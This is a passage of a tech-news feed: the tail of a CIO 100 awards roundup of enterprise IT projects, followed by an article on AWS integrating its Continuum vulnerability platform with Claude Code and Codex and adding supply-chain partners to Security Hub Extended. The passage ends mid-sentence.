<p class="wp-block-paragraph">Legacy processes were limiting Belcorp’s ability to scale and compete. Its manufacturing relied on ERP-driven processes with limited shop-floor automation and weak connectivity across production, packaging, quality, and maintenance. The company depended heavily on manual records and post-process reconciliation, resulting in fragmented data, limited real-time insight, inefficiencies, and higher risks for errors.</p>



<p class="wp-block-paragraph">Smart Factory changed all that. The IT initiative reimagined how manufacturing teams work “by creating a connected, data-driven environment where production, quality, maintenance, and operations are aligned around real-time information and standardized execution,” says Venkat Gopalan, chief digital, data, and technology officer.</p>



<p class="wp-block-paragraph">At Smart Factory’s core is a manufacturing execution system that orchestrates production workflows, quality processes, and operational execution, he explains. IoT-enabled equipment integration and a centralized SCADA platform provide real-time visibility into shop-floor operations, while electronic batch records digitize production execution, strengthen traceability, and reinforce compliance by design.</p>



<p class="wp-block-paragraph">Integrating those operational technologies with the company’s enterprise platforms was another critical component of success, Gopalan says, creating a trusted flow of real-time data across manufacturing, quality, maintenance, and business systems. “This connected architecture transformed isolated data into actionable insights, enabling faster decision-making, greater operational visibility, and continuous improvement across the manufacturing lifecycle,” he adds.</p>



<p class="wp-block-paragraph">The initiative generated more than $1 million in financial benefits in its first year alone.</p>



<p class="wp-block-paragraph">“Most importantly, Smart Factory established the digital foundation for the future of manufacturing at Belcorp,” Gopalan says. “With real-time operational data and connected systems now in place, we’re well positioned to accelerate advanced analytics, AI-driven optimization, predictive maintenance, and other Industry 4.0 capabilities that will continue delivering value for years to come.”</p>



<h2 class="wp-block-heading">Cohesity replatforms post-acquisition for commercial growth</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> Cohesity</p>



<p class="wp-block-paragraph"><strong>Project:</strong> Lead to Cash Replatforming Program (Veritas Integration)</p>



<p class="wp-block-paragraph"><strong>IT leader:</strong> <a href="https://www.linkedin.com/in/brianspanswick/">Brian Spanswick</a>, CIO</p>



<p class="wp-block-paragraph">Cohesity set an ambitious objective: Complete an enterprise-scale lead-to-cash replatform in under six months.</p>



<p class="wp-block-paragraph">That’s a tight timeline for any replatforming initiative, but Cohesity’s project had another layer of complexity. It followed Cohesity’s December 2024 acquisition of Veritas, a company twice its size in revenue, leaving Cohesity to integrate the majority of a global enterprise revenue engine into its own operating model without disrupting customers, partners, or sellers.</p>



<p class="wp-block-paragraph">“We had to bring the two companies together, merge the workforces together, and create an overall harmonized organization and operating infrastructure platform,” says Eric Brown, who as CFO and COO led the project.</p>



<p class="wp-block-paragraph">The program migrated heavily customized CRM, CPQ, PRM, ERP, and subscription platforms (some of which were “very brittle, very bespoke,” Brown says) to a unified SaaS CRM, CPQ, and ERP environment with uninterrupted selling, billing, and partner operations.</p>



<p class="wp-block-paragraph">This was no lift-and shift, Brown stresses. “It was a business process optimization project as well. We want to run very efficiently, so we questioned everything and used the migration process to simplify and streamline the business in every possible respect.”</p>



<p class="wp-block-paragraph">The initiative enabled continuity for 13,000-plus customers, protected revenue during integration, and established a scalable commercial foundation for future growth.</p>



<p class="wp-block-paragraph">Brown cites several factors that contributed to success. First, leadership was upfront about what it would take to meet the deadline, a process that involved carefully prioritizing the capabilities that would appear in the first iteration. Leadership also streamlined decision-making, establishing office hours that “ran with military precision” to handle issues. And the company selected a specialized partner, requiring its top talent be assigned to Cohesity.</p>



<h2 class="wp-block-heading">Dairyland Power goes agentic to protect field crews</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> Dairyland Power Cooperative</p>



<p class="wp-block-paragraph"><strong>Project:</strong> ODIN — Organizational Effectiveness Agentic AI</p>



<p class="wp-block-paragraph"><strong>IT leader:</strong> <a href="https://www.linkedin.com/in/nate-melby-0199712/">Nate Melby</a>, VP and CIO</p>



<p class="wp-block-paragraph">Dairyland Power Cooperative had amassed a large collection of field observations, incident reports, near-misses, safety rules, and work methods that could yield insights into processes and practices that could help protect its workers.</p>



<p class="wp-block-paragraph">But the insights were essentially out of reach, trapped in siloes.</p>



<p class="wp-block-paragraph">Dairyland’s organizational effectiveness team turned to CIO Nate Melby for help unlocking those insights. Melby then turned to agentic AI, recognizing that the technology could address the team’s need to make better use of its data.</p>



<p class="wp-block-paragraph">“This was about finding insights on how to work more safely,” Melby says. “It’s about preventing incidents.”</p>



<p class="wp-block-paragraph">The collaboration between the two teams created ODIN, the first agentic AI implementation of its kind in the electric utility industry.</p>



<p class="wp-block-paragraph">Focused on worker safety, ODIN autonomously connects the collective safety knowledge of the organization and delivers actionable insights directly to field crews at the moment work is planned.</p>



<p class="wp-block-paragraph">ODIN was developed through a hybrid approach that combined an agentic AI platform and Dairyland’s internal private generative AI platform called VoltWrite. ODIN leverages LLMs, retrieval-augmented generation, and a coordinated swarm of autonomous agents.</p>



<p class="wp-block-paragraph">Agents work together to analyze internal safety data, performance history, work practices, and safety rules and then synthesize the information into clear guidance on the safest way to perform specific tasks.</p>



<p class="wp-block-paragraph">ODIN has produced results, including a reduction in OSHA recordable injuries and improvements in the quality and consistency of pre-job safety briefings.</p>



<p class="wp-block-paragraph">ODIN was deployed in early 2025 for use by Dairyland’s workers in transmission construction and electrical maintenance, which are the highest-risk work areas. Dairyland is looking to expand ODIN’s use to other teams.</p>



<h2 class="wp-block-heading">Dow’s digital sustainability ledger drives low-carbon sales</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> Dow</p>



<p class="wp-block-paragraph"><strong>Project:</strong> Carbon Footprint Ledger</p>



<p class="wp-block-paragraph"><strong>IT leader: </strong><a href="https://corporate.dow.com/en-us/about-dow/leadership/debra-bauler.html">Deb Bauler</a>, Chief Information and Digital Officer</p>



<p class="wp-block-paragraph">Executives at Dow consider the Carbon Footprint Ledger (CFL) as more than a technology or innovative carbon accounting methodology. According to Senior Global IT Director <a href="https://www.linkedin.com/in/jeremypreston25/">Jeremy Preston</a>, CFL is “a digital business capability that enables Dow to translate sustainability investments into customer value.”</p>



<p class="wp-block-paragraph">CFL transformed how Dow uses greenhouse gas emissions data. It combines a methodology aligned to international standards with an enterprise-scale digital platform. It also integrates manufacturing, supply chain, commercial, and sustainability data to generate product carbon footprints under enterprise-level governance and management at scale.</p>



<p class="wp-block-paragraph">In doing so, Preston says it creates “a trusted, traceable link between low-carbon processes and raw materials implemented across its manufacturing network and the lower-carbon products customers seek.”</p>



<p class="wp-block-paragraph">The technology team worked closely with sustainability and business teams, collaboratively developing the capabilities needed to reconstruct product genealogy, maintain end-to-end data lineage, track low-carbon attributes across interconnected manufacturing processes, and generate product carbon footprints that can support customer offerings and commercial transactions.</p>



<p class="wp-block-paragraph">CFL was built on Dow’s Integrated Data Hub and in partnership with Boston Consulting Group and Databricks.</p>



<p class="wp-block-paragraph">The core CFL platform is fully deployed and supports commercial transactions today.</p>



<p class="wp-block-paragraph">Preston says CFL “enables Dow to turn sustainability investments into customer value, commercial differentiation, and new growth opportunities.” Dow reports that it has driven hundreds of millions of dollars in low-carbon product sales in 2025 and 2026.</p>



<p class="wp-block-paragraph">The company is now expanding its use. “We are extending adoption across additional products, manufacturing networks, business segments, and customer use cases while continuing to enhance automation, analytics, and integration with commercial processes,” Preston says.</p>



<h2 class="wp-block-heading">J&amp;J transforms quality management with AI</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> Johnson &amp; Johnson</p>



<p class="wp-block-paragraph"><strong>Project:</strong> Q&amp;C Strategy</p>



<p class="wp-block-paragraph"><strong>IT leader:</strong> <a href="https://www.linkedin.com/in/mikecomprelli/">Michael Comprelli</a>, Vice President, Head of Technology, Technical Operations, and Risk; <a href="https://www.linkedin.com/in/inradius/">Joel O’Connor</a>, Head of Technology, Medtech Quality, and Compliance</p>



<p class="wp-block-paragraph">Johnson &amp; Johnson is using AI to transform quality management through its Q&amp;C Strategy.</p>



<p class="wp-block-paragraph">QuIn is an AI-powered digital assistant that fuses human expertise with machine learning, automation, and data-driven insights to boost efficiency, reliability, and worker impact. By embedding gen AI into core quality management systems processes, QuIn proactively gathers actionable insights, increases operational efficiency, and allows teams to focus on high-value, patient-centric work.</p>



<p class="wp-block-paragraph">Cora is an innovative generative AI platform that provides regulatory intelligence monitoring, impact analysis, and augmented content revision. Cora assists with document analysis, compliance comparison, stakeholder analysis, policy/standard creation, procedural/document updates, and document comparison. Cora is purpose-built for regulated environments, validating outputs against source material and offering a user experience that instills trust in the outcome.</p>



<p class="wp-block-paragraph">QuIn and Cora, which automate time-intensive tasks and democratize information access, are on track to deliver significant value, with J&amp;J reporting more than $62 million in documented true cost savings by 2028 from QuIn alone. Cora delivered $2 million in cost efficiency in 2025 and will deliver a documented cost savings of $25 million by 2028.</p>



<p class="wp-block-paragraph">“Our teams proved responsible AI can be applied meaningfully in a highly regulated environment without compromising the rigor, accountability, or human judgment that quality requires,” says Michael Comprelli, vice president, head of technology, technical operations, and risk.</p>



<p class="wp-block-paragraph">He continues, saying that J&amp;J “moved these ideas beyond experimentation and into products that employees use in their daily work. We did that by bringing together Quality expertise, product management, data engineering, architecture, cybersecurity, user-experience design and AI engineering around a common purpose.”</p>



<h2 class="wp-block-heading">JLL brings intelligent automation to business services</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> JLL</p>



<p class="wp-block-paragraph"><strong>Project:</strong> Business Service Digitization</p>



<p class="wp-block-paragraph"><strong>IT leader:</strong> <a href="https://www.linkedin.com/in/pinak-dash/">Pinak Dash</a>, Global Head of JLL Business Services and Legal Technologies</p>



<p class="wp-block-paragraph">JLL launched its digitization initiative to drive process redesign as well as systematic AI and RPA deployment across JLL Business Services (JBS).</p>



<p class="wp-block-paragraph">The initiative was designed to address inefficiencies that hampered scalability and competitive positioning. It was also designed to eliminate manual processes that consumed thousands of hours across finance, HR, legal, procurement, marketing, research, IT, and lease administration.</p>



<p class="wp-block-paragraph">Pinak Dash, global head of JBS and legal technologies, says the digitization initiative had a dual-strategy combining traditional digitization with generative AI innovation to hundreds of processes.</p>



<p class="wp-block-paragraph">JLL lists three innovations critical to the program’s success.</p>



<p class="wp-block-paragraph">First is a hybrid platform that integrates RPA with JLL’s proprietary AI platform called Falcon, which created intelligent automation that adapts and learns. It enables real-time process automation, intelligent document processing with automated extraction/validation, and smart decision-making for continuously optimizing workflows.</p>



<p class="wp-block-paragraph">The second innovation is its use of ProHance for real-time process monitoring and enabling of data-driven optimization. Sensors capture granular productivity metrics, identify bottlenecks, and provide actionable insights for continuous improvement across automated and manual processes.</p>



<p class="wp-block-paragraph">Third is its custom AI assistants and transaction agents. Falcon-powered assistants provide intelligent knowledge search while specialized agents execute complex transactions across enterprise SaaS platforms. These handle multisystem workflows, reducing human touchpoints while maintaining accuracy and compliance.</p>



<p class="wp-block-paragraph">Dash says the initiative has delivered quantifiable benefits through improved efficiency, accuracy, and quality of services provided to clients.</p>



<p class="wp-block-paragraph">“The initiative delivers on our business goals, makes us more efficient, provides customers better service, and it opens up the capabilities and bandwidth of our people to do what they like to do and to find innovative ways to serve our business,” he adds.</p>



<h2 class="wp-block-heading">Nationwide partnership platform delivers efficiencies, business growth</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> Nationwide</p>



<p class="wp-block-paragraph"><strong>Project:</strong> Enterprise Digital Platform (EDP)</p>



<p class="wp-block-paragraph"><strong>IT leader:</strong> <a href="https://www.linkedin.com/in/michael-carrel-701839/">Michael Carrel</a>, EVP and CTO</p>



<p class="wp-block-paragraph">Nationwide’s new Enterprise Digital Platform (EDP) gives the company “a scalable way to connect with external partners quickly, securely, and consistently across all areas of our business,” says company EVP and CTO Michael Carrel.</p>



<p class="wp-block-paragraph">He explains that “instead of treating every integration as a custom effort, EDP creates a common front door for digital products, documentation, onboarding and governance.”</p>



<p class="wp-block-paragraph">That innovation has produced better experiences for the company’s partners. It saves time for Nationwide teams, partners, and customers. And it supports faster launch times for new products and enables growth across the business.</p>



<p class="wp-block-paragraph">“EDP changed the model from fragmented, point-to-point integrations into an enterprise platform built around reusable digital products. That shift lets us support a range of integration options in one governed environment, meet partners at different stages of technical maturity, and add new capabilities over time without redesigning every relationship from scratch,” Carrel explains.</p>



<p class="wp-block-paragraph">EDP uses cloud-native microservices, role-based access control, and advanced analytics. Nationwide IT created modular microservices to make EDP more scalable, resilient, and adaptable. And IT decoupled it from infrastructure-specific dependencies so that it would be a platform-agnostic developer portal. That, Carrel says, reduced operational constraints across environments.</p>



<p class="wp-block-paragraph">Additionally, IT shifted from a user-specific model to role-based access, which improved security, simplified administration, and better served the needs of different audiences.</p>



<p class="wp-block-paragraph">Meanwhile, robust analytics delivers visibility into platform usage and performance, which Carrel says helps ensure Nationwide continuously evolves the platform based on measurable outcomes.</p>



<p class="wp-block-paragraph">The core platform is fully deployed, with Nationwide planning to expand it.</p>



<p class="wp-block-paragraph">“Our Enterprise Digital Platform is more than a piece of technology,” Carrel notes, “it represents a strategic enabler to support growth objectives across Nationwide’s businesses.”</p>



<h2 class="wp-block-heading">PITT Ohio fast-tracks shipment requests with AI assist</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> PITT Ohio</p>



<p class="wp-block-paragraph"><strong>Project:</strong> No Touch Email (N@TE AI)</p>



<p class="wp-block-paragraph"><strong>IT leader:</strong> <a href="https://www.linkedin.com/in/scott-sullivan-b359891/">Scott Sullivan</a>, President and CEO (formerly CIO)</p>



<p class="wp-block-paragraph">As PITT Ohio started its AI journey in 2024, the mandate was clear: Use the technology to solve “real problems,” says Ryan Carner, director of enterprise IT solutions.</p>



<p class="wp-block-paragraph">“We wanted to hit the ground running and find a problem that was solvable,” Carner says, noting that the company also wanted to use the experience to build in-house AI skills. “The idea was to find a business case for AI that would be our first but not the only one.”</p>



<p class="wp-block-paragraph">PITT Ohio leaders decided to tackle what Carner describes as a “mundane but very important task for how our business operates”: handling emails to the customer service team.</p>



<p class="wp-block-paragraph">The need was significant. Customer service representatives were manually processing hundreds of pickup request emails daily, each requiring five to 15 minutes to interpret and re-enter shipment details into the company’s transportation management system (TMS). The emails were complicated, containing a lot of information submitted in nonstandardized ways and varying formats. This repetitive task consumed valuable time, introduced errors, and delayed customer response.</p>



<p class="wp-block-paragraph">N@TE uses generative AI and natural language processing to transform unstructured email content into structured pickup orders automatically and in real-time. N@TE scans incoming emails, extracts key shipment data, and creates orders directly in the TMS via API integration. It operates seamlessly within existing workflows, requiring no change in customer behavior or retraining of staff.</p>



<p class="wp-block-paragraph">PITT Ohio deployed N@TE in 2025, and the company also secured a patent for the product that year. N@TE has produced a 30-60X increase in processing speed, 99% accuracy in extracting and populating order data, and a 70% reduction in handling costs per pickup order.</p>



<h2 class="wp-block-heading">SMU builds AI adoption through grassroots ambassador program</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> Southern Methodist University</p>



<p class="wp-block-paragraph"><strong>Project:</strong> Scaling AI Without Scaling AI: Organizational AI Scaling Through Willingness</p>



<p class="wp-block-paragraph"><strong>IT leader:</strong> <a href="https://www.linkedin.com/in/jasontwarner/">Jason Warner</a>, Associate CIO</p>



<p class="wp-block-paragraph">Like executives in most organizations, leaders at Southern Methodist University encountered mixed attitudes about AI. Some workers had little interest in using the tech, others were afraid it would take jobs, still others were curious about what it could do.</p>



<p class="wp-block-paragraph">Associate CIO Jason Warner and other leaders decided to leverage that last group, believing the best way to get SMU faculty and staff to embrace AI was to use enthusiasts to help smooth the way.</p>



<p class="wp-block-paragraph">So, instead of treating AI as a conventional technology rollout, Warner and his colleagues built opt-in communities of practice known as the AI Coalition of the Willing and Operation Copilot.</p>



<p class="wp-block-paragraph">The goal, Warner says, was to build institutional capability, reduce risk, and generate momentum.</p>



<p class="wp-block-paragraph">“We knew the fastest way to scale AI was to scale the willingness of people to use the technology, and not talking to people about cost savings and the like,” Warner says, adding that willing users as great ambassadors and evangelists who showcase in formal and informal ways the technology’s potential for hesitant or skeptical colleagues.</p>



<p class="wp-block-paragraph">Participating faculty members have access to a licensed ChatGPT account as long as they use it. Staff members have access to Copilot accounts after taking a self-paced training course and likewise must use it to keep that access.</p>



<p class="wp-block-paragraph">Warner says these willing workers are demonstrating the benefits of AI (significant time reclamation, reduced cognitive load, improved quality of outputs, expanded professional capacity).</p>



<p class="wp-block-paragraph">SMU is now moving to a single solution and scaling AI, confident that its use will deliver returns following in the footsteps of the early adopters.</p>



<p class="wp-block-paragraph"><strong><em><strong>Interested in meeting and learning from all CIO 100 winners? Join us next week at CIO 100 Awards &amp; Conference in Frisco, TX. Limited seats remain! </strong><a href="https://register.foundryco.com/mq3MaX?rt=5FJf1djA6UC8VitjiXqAMg&amp;utm_source=Editorial&amp;utm_campaign=CIOArticle&amp;utm_medium=CIOArticle&amp;RefId=CIOArticle"><strong>Register here</strong></a><strong> </strong></em></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS Continuum integrates with OpenAI Codex and Anthropic Claude Code in major AI security push]]></title>
<description><![CDATA[Amazon Web Services is threading its AI-powered security infrastructure directly into the coding environments built by two of its fiercest rivals — and in doing so, it is making a bold bet that controlling the security layer matters more than controlling the model.AWS announced at Black Hat USA 2...]]></description>
<link>https://tsecurity.de/de/3713275/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713275/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:51:02 +0200</pubDate>
<content:encoded><![CDATA[<p><a href="https://aws.amazon.com/">Amazon Web Services</a> is threading its AI-powered security infrastructure directly into the coding environments built by two of its fiercest rivals — and in doing so, it is making a bold bet that controlling the security layer matters more than controlling the model.</p><p>AWS announced at <a href="https://blackhat.com/us-26/">Black Hat USA 2026</a> this month that its <a href="https://aws.amazon.com/blogs/security/aws-partners-with-anthropic-and-openai-to-bring-aws-continuum-into-developer-workflows/">Continuum platform</a> for code vulnerabilities will integrate directly into Anthropic's <a href="https://claude.com/product/claude-code">Claude Code</a> and OpenAI's <a href="https://chatgpt.com/codex/">Codex</a>, alongside AWS's own <a href="https://kiro.dev/">Kiro IDE</a>.</p><p>The move embeds AWS security tooling at the point where developers write code, regardless of which AI model they use to do it. Simultaneously, AWS expanded <a href="https://aws.amazon.com/about-aws/whats-new/2026/08/aws-security-hub-extended-adds-supply-chain-security/">Security Hub Extended </a>— its curated, single-bill security marketplace launched in February — with a 10th security category focused on supply chain protection, bringing in <a href="https://www.chainguard.dev/">Chainguard</a> and <a href="https://socket.dev/">Socket</a> as partners.</p><p>Together, the announcements are AWS's most sweeping attempt yet to position itself as the default security control plane for enterprise software development in the AI era — a role that carries enormous commercial implications as the global cloud infrastructure market surpasses $143 billion per quarter, according to <a href="https://www.srgresearch.com/articles/q2-cloud-market-passes-143-billion-highest-growth-rate-in-eight-years">Synergy Research Group</a>.</p><h2><b>Why frontier AI models turned the vulnerability backlog into a five-alarm fire</b></h2><p>The urgency behind both launches traces back to a single inflection point that reshaped enterprise security earlier this year. <a href="https://www.anthropic.com/claude/mythos">Claude Mythos Preview</a>, announced by Anthropic in April, is a general-purpose AI model that during testing revealed striking cybersecurity capabilities far exceeding any prior system.</p><p>In pre-release evaluations, Mythos <a href="https://www.anthropic.com/glasswing">identified thousands</a> of previously unknown zero-day vulnerabilities across every major operating system and web browser. More than <a href="https://www.anthropic.com/research/mythos-preview">99% of those vulnerabilities remain unpatched</a> by their maintainers, and the median time from vulnerability discovery to weaponized exploit — already collapsed from 771 days in 2018 to under four hours by 2024 — is projected to reach under one hour by the end of 2026.</p><p>Chet Kapoor, AWS's vice president of search, security, and observability, framed the challenge in stark terms in an exclusive interview with VentureBeat. "CISOs have had code vulnerabilities for a while, and then Mythos came along, and it just made it a lot worse," Kapoor said. "They already had a backlog. Now the backlog is 5x more, and that causes a problem."</p><p>That problem — the exponential growth in known vulnerabilities outpacing any organization's ability to triage and fix them — is precisely what <a href="https://aws.amazon.com/blogs/security/aws-partners-with-anthropic-and-openai-to-bring-aws-continuum-into-developer-workflows/">Continuum</a> is designed to address. Kapoor described AWS's broader security vision as a shift from "telemetry, storage, query, dashboards for humans to telemetry, context, reasoning, and actions by agents." The shorthand for that vision is a phrase AWS repeated throughout Black Hat: autonomous security at machine speed.</p><h2><b>Inside Continuum's four-phase system for finding and fixing code flaws automatically</b></h2><p>Continuum operates as what AWS calls an “<a href="https://aws.amazon.com/blogs/security/aws-partners-with-anthropic-and-openai-to-bring-aws-continuum-into-developer-workflows/">agent-team loop architecture</a>” — a sophisticated orchestration harness that selects the right AI model for each task, connects to a customer's environment, and delivers validated secure code. Under the hood, it runs through four distinct phases.</p><p>Kapoor broke them down for VentureBeat. Discovery uses multiple frontier AI models to scan code and ingest a customer's existing vulnerability backlog. Prioritization — which Kapoor called "one of our biggest value adds" — contextualizes each finding against a customer's actual environment and business risk. "You go from 100 to 2,000, and now you're like, whoa, I didn't even know which 100 to focus on," he said.</p><p>Validation then builds reproducible exploits in an isolated sandbox to confirm whether a vulnerability is genuinely exploitable. "Once I do them, how will it behave?" Kapoor explained. "You create a sandbox to go off and make that happen. So you can figure out what the blast radius is." The validation phase covers both first-party code that customers wrote themselves and third-party open source code they depend on. Finally, remediation offers fixes — whether network configuration changes, policy adjustments, or code patches — that the system has already tested in the same sandbox. The human stays in control throughout, approving outcomes at whatever level of autonomy the organization is comfortable with.</p><p>The commercial model is equally deliberate. Customers pay AWS a single price for Continuum. AWS absorbs the underlying token costs for whichever frontier model performs best at each phase of the scan. "The customer purchases Continuum, period," Kapoor told VentureBeat. "We optimize on which model to use for what because, quite frankly, GPT Cyber is good at some things, Mythos is good at some things."</p><h2><b>How AWS convinced OpenAI and Anthropic to open their coding tools to a rival's security layer</b></h2><p>The most strategically striking element of the announcement is the integration with OpenAI <a href="https://chatgpt.com/codex">Codex</a> and Anthropic <a href="https://claude.com/product/claude-code">Claude Code</a>. AWS competes directly with both companies across cloud AI services. Amazon holds a massive investment in Anthropic, and OpenAI operates its own growing infrastructure that competes for the same enterprise AI workloads. Yet both agreed to embed Continuum inside their developer environments.</p><p>When VentureBeat asked Kapoor directly about the competitive dynamics, he pushed back on the framing entirely. "Who is the competitor?" Kapoor said. "I can keep thinking about Anthropic and OpenAI to be partners. I don't understand the word 'competitor' in your description of the question." He added: "They're partners with us. We use their models. We plug into their environments. Which is why we actually brought them together to do this."</p><p>Kapoor argued that working with a single model provider would be insufficient. "I don't think it's good enough to just do it with one company," he said. "Everybody is going to leapfrog each other over a period of time." By absorbing token costs and presenting a single bill to the customer, AWS positions Continuum as infrastructure — not a model wrapper. The harness, not the engine, becomes the durable competitive asset.</p><p>As Kapoor wrote in his <a href="https://aws.amazon.com/blogs/security/aws-partners-with-anthropic-and-openai-to-bring-aws-continuum-into-developer-workflows/">blog post</a> announcing the partnership: "An AI harness is the orchestration layer that wraps around a model to connect it to tools, guardrails, memory, and workflows, so it delivers outcomes. Think of the model as the engine and the harness as everything around it. You need both to have a high-performance car." </p><p>AWS partners echoed the logic. "Model choice was never the hard part for enterprises. Trust in what the model does in production is," said Val Henderson, CEO of AWS Premier Partner Caylent, in comments <a href="https://www.crn.com/news/ai/2026/aws-openai-and-anthropic-coding-integrations-to-drive-ai-wins-via-security-partners-say">reported by CRN</a>.</p><h2><b>AWS adds supply chain security to its curated marketplace as open source threats intensify</b></h2><p>The second prong of AWS's Black Hat announcements extends <a href="https://aws.amazon.com/about-aws/whats-new/2026/08/aws-security-hub-extended-adds-supply-chain-security/">Security Hub Extended</a> into supply chain security as its 10th category, with Chainguard and Socket as curated partners. The Extended plan now includes 23 curated partner solutions, all on a single AWS bill with no required long-term commitments, covering endpoint, identity, email, network, data, browser, cloud, AI, security operations, and now supply chain.</p><p>Michael Fuller, AWS's director of security services, told VentureBeat that the addition was driven entirely by customer demand. "Over the last six to eight months, it's gotten quite a bit of news around what's happening in the supply chain space, with the fact that everybody builds on open source," Fuller said. "Our customers quickly reached out and said, 'Security Hub Extended is resonating. We would love to see a supply chain security category with some key players there because it's a hot topic for us.'"</p><p>The two partners were chosen to be complementary rather than duplicative. <a href="https://www.chainguard.dev/">Chainguard</a> focuses on providing hardened, secure-by-default container images and packages rebuilt from verified source code. <a href="https://socket.dev/">Socket</a> performs behavioral monitoring of packages as they are pulled into a developer's environment, detecting threats like typosquatting, maintainer account takeover, and obfuscated malicious code. "Together, between the three of us — us with consolidating that, ChainGuard providing really good hardened and cleaned images and packages, and then Socket providing a behavioral analysis over the top — gives customers a really good holistic supply chain security offering," Fuller said.</p><p>The complementary approach addresses two distinct attack vectors. An attacker can publish a malicious package that contains no known vulnerabilities — Chainguard's clean-build approach defends against that. Separately, an attacker can compromise a legitimate maintainer's account and push a tainted update to a trusted package — Socket's behavioral detection catches that. Both vectors are amplified in the AI coding era, Fuller noted, because AI agents face the same supply chain risks as human developers: "Agents can be misled on, 'Hey, this is a well-known package that you're looking for,' and therefore pull it down, even though it's been maliciously obfuscated."</p><h2><b>Why AWS chose two partners per category instead of building a security marketplace</b></h2><p>The partner selection strategy behind <a href="https://aws.amazon.com/about-aws/whats-new/2026/08/aws-security-hub-extended-adds-supply-chain-security/">Security Hub Extended</a> reveals a deliberate philosophy that distinguishes it from the <a href="https://aws.amazon.com/marketplace/">AWS Marketplace</a>, which already hosts tens of thousands of security offerings.</p><p>Fuller told VentureBeat that customers articulated clear principles for what they wanted. "One was don't give me hundreds of offerings. We already have the AWS Marketplace," he said. "Two was give me a sweet spot. Our customers were saying, give me two in each category, and when you look at those two, don't give me head-to-head competitors. Give me one that I may know well, that is an established player, and give me one that's taking a different approach."</p><p>Fuller pointed to the security operations category as the template. "You have Splunk, hard to argue not an established leader in security operations, and then you have Seven AI that's kind of taking a very different approach, and they're complementary in a lot of ways."</p><p>The decision to build internally versus partner follows a similar logic. For endpoint detection and response, AWS has no structural advantage, so it partners exclusively. For cloud security, AWS builds its own native tools because it intimately understands its own infrastructure — but still partners with Upwind to give customers a second option.</p><p>"At the end of the day, what we're trying to do here is ensure that our customers can operate in the most secure way possible on AWS, not necessarily grow a large security business as the core goal," Fuller said. "That's why it's very easy for us to decide to do both building ourselves, but also then inviting partners to participate."</p><p>The pricing model reinforces this accessibility. Fuller said customers demanded pay-as-you-go options alongside traditional multi-year commitments. "All of the Security Hub Extended offerings have a public-facing, pay-as-you-go price, just like our first-party offerings do within AWS," he said. "So that gives customers the option to go kick the tires, get going, even scale up and use the services without going through a traditional sales cycle."</p><h2><b>Shadow agents and AI cost harvesting emerge as the next frontier of cloud security threats</b></h2><p>Both AWS executives addressed an emerging security concern gaining traction among CISOs: the proliferation of <a href="https://www.weforum.org/stories/cybersecurity/unsecured-ai-agents-cyberthreat/">unregistered AI agents</a> — what the industry has begun calling "<a href="https://aws.amazon.com/blogs/security/aws-partners-with-anthropic-and-openai-to-bring-aws-continuum-into-developer-workflows/">shadow agents</a>" — and the novel attack patterns they enable.</p><p>Kapoor told VentureBeat that shadow agents are a genuine and growing problem, though he was careful to separate it from the Continuum announcement. "There are many agents that are registered with registration directories, whether it's Vertex, whether it's Agent Core, whatever else it might be, but there are many agents that are not registered with the registry, and those are what people are calling shadow agents because they can actually do some harm," he said. "Discovering shadow agents is not easy. The industry is working on it."</p><p>Fuller provided more granular detail on what AWS has already deployed. <a href="https://aws.amazon.com/security-hub/">Security Hub</a> now includes a free AI inventory capability that uses three data layers: AWS Config identifies AI-related services like <a href="https://aws.amazon.com/sagemaker/">SageMaker</a>, <a href="https://aws.amazon.com/bedrock/">Bedrock</a>, and <a href="https://aws.amazon.com/bedrock/agentcore/">Agent Core</a> across an organization; Amazon Inspector scans compute instances and containers for AI-related software; and <a href="https://aws.amazon.com/guardduty/">GuardDuty</a> compares DNS request and response logs against known AI tools and agentic workloads.</p><p>Beyond inventory, Fuller revealed that <a href="https://aws.amazon.com/guardduty/">GuardDuty</a> now monitors data plane events — including prompts, prompt volume patterns, and inference cost analysis — to detect what AWS calls "cost harvesting."</p><p>The attack mirrors the cryptocurrency mining that became common after cloud credential compromises: an attacker gains access to an AWS account and burns through as much free AI inference as possible before detection.</p><p>"We're seeing what we're calling cost harvesting," Fuller said. "They'll spin up, basically try to get as much free inference as they can until that's discovered." It is, Fuller noted, "the same thing that's happening in AI" as happened with crypto mining — and GuardDuty's detection of credential compromise and unauthorized compute usage translates directly to the new threat.</p><h2><b>How Continuum and Security Hub Extended fit together in AWS's enterprise security strategy</b></h2><p>Although both announcements landed the same week, AWS is treating the products behind them as separate. Kapoor described<a href="https://aws.amazon.com/blogs/security/aws-partners-with-anthropic-and-openai-to-bring-aws-continuum-into-developer-workflows/"> Continuum</a> to VentureBeat as distinct from<a href="https://aws.amazon.com/about-aws/whats-new/2026/08/aws-security-hub-extended-adds-supply-chain-security/"> Security Hub Extended</a>, sold as its own standalone product. AWS declined to discuss its longer-term roadmap for the two.</p><p>The design logic points in one direction. <a href="https://aws.amazon.com/blogs/security/aws-partners-with-anthropic-and-openai-to-bring-aws-continuum-into-developer-workflows/">Continuum</a> addresses the code an enterprise writes and the open source it inherits. <a href="https://aws.amazon.com/about-aws/whats-new/2026/08/aws-security-hub-extended-adds-supply-chain-security/">Security Hub Extended</a> addresses everything else — and the newest of its categories is where the two most clearly overlap. Continuum's validation phase covers third-party dependencies alongside a customer's own code;<a href="https://www.chainguard.dev/"> Chainguard</a> and<a href="https://socket.dev/"> Socket</a> harden and monitor the same packages from the other direction. One capability is built in-house, the other curated from partners, and they meet at the same attack surface.</p><p>Both proceed from the same premise: that enterprises no longer want a catalog, they want a recommendation.</p><p>"Customers want an opinionated point of view on how they should do security in the AI era," Kapoor told VentureBeat. "That's what Security Hub Extended was about — actually going off and giving them our opinion." AWS will continue to give customers choice, he added, "whether it is something that we ship or whether it is something from a partner."</p><p>That doctrine — a recommendation, with an escape hatch — is the through line connecting a curated marketplace to a first-party agent platform, and it makes the boundary between them more porous than two separate announcements suggest.<a href="https://aws.amazon.com/security-hub/"> Security Hub</a> has already absorbed capabilities that did not exist a year ago, including the free AI inventory and the cost 